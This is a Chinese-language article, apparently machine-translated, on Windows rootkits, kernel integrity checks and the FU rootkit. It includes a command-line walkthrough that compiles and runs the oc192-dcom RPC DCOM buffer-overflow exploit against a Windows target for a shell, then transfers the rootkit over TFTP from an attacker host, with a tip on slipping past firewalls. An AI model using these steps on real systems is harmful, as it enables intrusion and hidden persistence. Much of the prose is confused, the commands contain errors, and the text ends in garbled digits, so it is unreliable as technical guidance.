不是简单地将RAM大小乘以1.5，最好计算出所有专有字节内存总和，然后乘以1.5。大多数人在检查系统中的恶意软件时都会很自然地进行全部内存转储，但是当系统崩溃或者破坏时，问题基本上都是发生在内核模式。设备驱动程序是让CPU开放所有硬件I/O端口的唯一途径，然而，windows设备驱动程序从来没有直接访问过物理设备。作为界面或者地址总线类型的HAL功能，能够为驱动程序传递需要的信息完成路径。它与rootkit的共同点在于：都是使用算法的。他们都是用代码修改自身而不被发现，他们都是启发式的，他们都利用这样的理论：文件可以通过替代数据流和指示转换来隐藏在NTFS文件系统中。Rootkit在加载的时候，会改变自身的名称创建服务(这意味着它们与SCM有通信)而不被发现，只有当他们以前被发现过并且被写入签名才可能被发现。话虽如此，我们有理由认为有效的rootkit工具会检查内核代码是否被修改：Ntoskrnl.exe和HAL.dll内核组件的.text与磁盘内核文件是否相符。请注意，.text指代代码部分(cs寄存器)，这可能是因为代码自我修复功能可以取代一些硬件相关的功能以符合实际硬盘情况。

　　我们假设对RPC DCOM缓冲区漏洞的经常性写入，例如代码名为oc192-dcom.c，我们将该代码下载至我们的Linux ISO发挥系统中，但是首先我们要启动TFTP服务器并运行，TFTP使用的UDP协议可以配置为绕过防火墙(例如DNS/53)，因此，它是可以来回转移文件的：

 #! /usr/local/sbin/atftpd --daemon --user group root /tftp
　　Check and see if the server is up and running:
　　#! ps -A | grep atftpd
　　Go the /usr/local directory
　　Now we will compile the code, oc192-dcom.c into a binary executable called dcomattack:
　　#! gcc oc192-dcom.c -o dcomattack
　　Run the buffer overflow.
　　#! ./dcomattack -d [Windows Target IP] -t0
　　You have spawned a shell!
　　#! tfp - [Linux Attack IP] PUT FU.exe
    
    Windows系列中Server 2003及其以上版本都会默认安装TFTP客户端，在Vista SP1中已经启用为一项功能。我们上传一个FU rootkit范例，它包含两个文件fu.exe 和msdirectx.sys，这两个文件作为一个文件运行，但没有被捆绑。fu.exe作为IOCTL’s通过msdirectx.sys驱动程序，这样，一旦驱动程序被加载，就不再需要任何特殊特权。msdirectx.sys是驱动程序，负责所有工作，直到下次重新启动都不会卸载。现在，FU可以隐藏任何驱动程序就像它隐藏于所有进程一样，如果你想向驱动程序发送IOCTL’s，就需要设置一个handle(分给文件允许程序进入的独一无二的标记)。FU没有想要隐藏或者删除这个符号链接，该符号链接是用来打开到被隐藏的驱动程序的准入记号。Process Explorer工具的菜单栏上有一个查看标签，在此标签中你可以选择“选择栏”，在这里你可以点击handle标签并选中所有选项按钮。准入记号是在进程线程需要访问资源以及打开资源时被创建的，准入记号是该线程每次与资源通信的引入值(value)。但是msdirectx.sys驱动程序在隐藏驱动程序的时候可能会删除符号链接，该驱动程序有很多用途，它可以修改任9 7 3 1 2 3 4 8 :